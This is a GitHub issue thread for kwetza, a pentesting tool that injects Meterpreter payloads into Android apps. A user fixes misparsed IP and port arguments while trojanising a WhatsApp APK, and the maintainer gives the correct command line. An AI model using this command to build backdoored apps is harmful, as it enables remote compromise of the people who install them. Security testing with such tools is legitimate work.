sensepost / kwetza

Python script to inject existing Android applications with a Meterpreter payload.
GNU General Public License v2.0
637 stars 237 forks source link

Endpoint IP and PORT. #22

Closed Esbjornsson closed 7 years ago

Esbjornsson commented 7 years ago

So, after typing "python kwetza.py APK.apk 192.168.XXX.XXX 4444 yes", which I assume is the correct way to type it, I get the PORT as the endpoint IP and yes as the endport PORT. I haven't got around to actually try if it still works, but it's rather annoying. Bug or what?

DECOMPILING TARGET APK [+] ENDPOINT IP: 4444 <----- Should be my IP [+] ENDPOINT PORT: yes <----- Should be my PORT [+] APKTOOL DECOMPILED SUCCESS [] BYTING TCP COMMS [] ANALYZING ANDROID MANIFEST [+] TARGET ACTIVIY: com.whatsapp.Main [] PREPARING PAYLOADS [] INJECTING INTO APK [+] CHECKING IF ADDITIONAL PERMS TO BE ADDED [] INJECTION OF CRAZY PERMISSIONS TO BE DONE! [+] TIME TO BUILD INFECTED APK... [] EXECUTING APKTOOL BUILD COMMAND... [+] BUILD RESULT

Esbjornsson commented 7 years ago

EDIT: The app doesn't connect to the Meterpreter when opened. Have tried this with 2 different apps.

Esbjornsson commented 7 years ago

EDIT 2: I figured it out!

So I the Don Does 30 video about this and he doesn't input TCP/HTTP before the IP. I scrolled down in the "code" section and saw that I was supposed to type in the TCP option!

brompwnie commented 7 years ago

Hi there, An example with correct usage would be "python kwetza.py hackme.apk https 10.42.0.118 4444 yes". This usage is specified in the Readme.